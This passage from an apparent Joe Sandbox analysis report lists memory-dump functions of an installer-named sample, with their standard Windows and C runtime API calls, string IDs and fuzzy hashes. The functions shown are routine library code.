                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 1e7e12d63033980b8985edd00b59a7a8bc165cec351f8f3a98bd1bd6d51b3550
                            • Instruction ID: eab4eb7e463d035e667aa248ba5a7116edb406267d46286a4989bd29636ce56d
                            • Opcode Fuzzy Hash: 1e7e12d63033980b8985edd00b59a7a8bc165cec351f8f3a98bd1bd6d51b3550
                            • Instruction Fuzzy Hash: 7C1123727042117B9B121AF88C80F6E22E9BBC637CB310628F12483BC0DF709C1B5212
                            Function 6C0D642A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6C0D4C5C,00000000,00000000,?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640), ref: 6C0D6441
                            • GetLastError.KERNEL32(?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?,6C0CB640,?,6C0CC28C,6C0D6026), ref: 6C0D644D
                              • Part of subcall function 6C0D649E: CloseHandle.KERNEL32(FFFFFFFE,6C0D645D,?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?,6C0CB640), ref: 6C0D64AE
                            • ___initconout.LIBCMT ref: 6C0D645D
                              • Part of subcall function 6C0D647F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C0D641B,6C0D50AE,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?), ref: 6C0D6492
                            • WriteConsoleW.KERNEL32(00000000,?,6C0D4C5C,00000000,?,6C0D50C1,00000000,00000001,00000000,6C0CB640,?,6C0CC7F6,?,?,6C0CB640,?), ref: 6C0D6472
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: f7e5d65830ea764b033562e18d0bad274f2741123d30b9cb2d3da09e7a0cf1a3
                            • Instruction ID: 5eda4a2dac03a8e02558c2c79822caa3fbda6cc4ead3d0031e45b199e47efa3a
                            • Opcode Fuzzy Hash: f7e5d65830ea764b033562e18d0bad274f2741123d30b9cb2d3da09e7a0cf1a3
                            • Instruction Fuzzy Hash: 23F01236140218BBCF621FD1DC04A8A3F76FF4A766F064450FA4886510DB32A8209FD0
                            Function 6C0C3694 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            • API String ID: 2427045233-4022487301
                            • Opcode ID: 032260210fceff220f5a75fe8da93f679a2742e7e4c439bfebf9e6407249ab37
                            • Instruction ID: a543a460883d32903657eb9558ae4f9fad2261a02f5e633fa80ae8fbefd185fe
                            • Opcode Fuzzy Hash: 032260210fceff220f5a75fe8da93f679a2742e7e4c439bfebf9e6407249ab37
                            • Instruction Fuzzy Hash: FF71A475F113169BDB208F95C880BEEB7F9EF0D318F244219E82067A90D775D945C7A2
                            Function 6C108C58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C108C5D
                              • Part of subcall function 6C10761A: __EH_prolog.LIBCMT ref: 6C10761F
                              • Part of subcall function 6C107A2E: __EH_prolog.LIBCMT ref: 6C107A33
                              • Part of subcall function 6C108EA5: __EH_prolog.LIBCMT ref: 6C108EAA
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            • API String ID: 3519838083-1089469559
                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction ID: 4990d455bec12654c4d3af9c5eabbf3283e91b256bd27fe6e6767ee95cb64635
                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction Fuzzy Hash: BB815931E04148DFDB15DFA8D990BDDBBB4AF19318F1041AAE512A77A0DF30AE49CB61
                            Function 6BF828E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6BF82A76
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            • API String ID: 4194217158-1161259238
                            • Opcode ID: 718e061a29077e29b6de86e339b6d44e29f9fe0b17f9f85d3687f996c468c99d
                            • Instruction ID: 76a54b918b8f7c1167b5f0ba34735a34b980047543981dbf74c1bda2922c8622
                            • Opcode Fuzzy Hash: 718e061a29077e29b6de86e339b6d44e29f9fe0b17f9f85d3687f996c468c99d
                            • Instruction Fuzzy Hash: 965106B29002049FCB14CF68D88069EBBF5FF89314F14856EE8599B351D33AF985CB91
                            Function 6C1365B2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: CK$CK
                            • API String ID: 3519838083-2096518401
                            • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                            • Instruction ID: e0fb38b6e014e8d908368ca0c3cbbb03f44dbeafbcf21eb175e2034c19de1c80
                            • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                            • Instruction Fuzzy Hash: EF517DB5B00329DFDB00CFA4C8C4BEEB7B5FB98358F158529D905EB641DB74A9068B60
                            Function 6C0CD46E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C0D4C46), ref: 6C0CD58B
                            • __dosmaperr.LIBCMT ref: 6C0CD592
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            • API String ID: 1659562826-4022487301
                            • Opcode ID: ca03ed901107687280cd70ff1e526e42bba5f33576bdc7237938efe9906bedb5
                            • Instruction ID: 59f11d2c45932e25761b97f9f4f9d87e9bd9eeb45d462a6a2f3cbdc23cd0c25a
                            • Opcode Fuzzy Hash: ca03ed901107687280cd70ff1e526e42bba5f33576bdc7237938efe9906bedb5
                            • Instruction Fuzzy Hash: 81415671754354AFDB12CF68C880BAD7FE5EF4A358F944259E8808B741D371AC128B92
                            Function 6C124C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction ID: c0654832f25e54183005db93e762329e714c27a797e3af9f8f6fba6ce326f3e5
                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                            • Instruction Fuzzy Hash: 8341B175605785EFCB119FA4C490BEEBBE2FF59308F00482EE09A97B50CB796944CB91
                            Function 6C120906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction ID: 4fc5c5d491add8c5601a3a8325a3aa03de59275f911fc49824ca8db895d16283
                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                            • Instruction Fuzzy Hash: 0F01C4B1E05349DEDB10DF9988906AEF7B4FF65304F40852EE42AE3A40C3385944CB55
                            Function 6C0CE298 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6C0CE2B9
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C0CABAA,?,00000004,?,4B42FCB6,?,?,6C0BFCFC,4B42FCB6,?), ref: 6C0CE2F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            • Opcode ID: c39e8de512a6d1eab448620ec614d8cc95ea47cf1a34c245a7575b1153cb4ab8
                            • Instruction ID: 90f98dcc1cd772012d213e66ccde793e19517e1ab742b203f8d4eea501774923
                            • Opcode Fuzzy Hash: c39e8de512a6d1eab448620ec614d8cc95ea47cf1a34c245a7575b1153cb4ab8
                            • Instruction Fuzzy Hash: FAF0C23270121576AB212A66AC01B9F37EC9F82BB9B214125EB34A7A80DB30A50181E7
                            Function 6C14C5D5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: p/K$J
                            • API String ID: 3519838083-2069324279
                            • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                            • Instruction ID: a163bf8d9367694f40be402209a68a3aff40ba465b8e897ed3140620df7e4ba4
                            • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                            • Instruction Fuzzy Hash: C001BCB1A117119FD724CF59C5143AAB7F4EF55729F10C85E9052A3B40C7F8A5088BA4
                            Function 6C12AFC7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C12AFCC
                              • Part of subcall function 6C12A4D1: __EH_prolog.LIBCMT ref: 6C12A4D6
                              • Part of subcall function 6C12914B: __EH_prolog.LIBCMT ref: 6C129150
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J
                            • API String ID: 3519838083-2882003284
                            • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                            • Instruction ID: f9e5fe9db865ed132e0fa4af171f9ffb70f4677871a8ee5c28529fed823adfe8
                            • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                            • Instruction Fuzzy Hash: 580102B1804B50CFC325CF6AC4A428AFBE0FB15308F90C95EC0AA57B50D7B8A508CB68
                            Function 6C144E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
                            • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                            • Instruction ID: 1110099f5b6f5a11cecb2c99a51b877514072c59d2ffe53079c2b405fbac02ef
                            • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                            • Instruction Fuzzy Hash: FD51D071944209AFDF01CF98D840BDEB7F1BF1931CF10846AE9626BA90DB75A94DCB90
                            Function 6C164F20 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: (?K$8?K$H?K$CK
                            • API String ID: 0-3450752836
                            • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                            • Instruction ID: f72cef8ea2a12b743197403cb17d69cd616b1d42aff0cb8b10854e281b56bcec
                            • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                            • Instruction Fuzzy Hash: 55F01DB05157009EC360CF46D54879BB7F4EB41709F50C95EE09A9BA40D3B8A5088FA8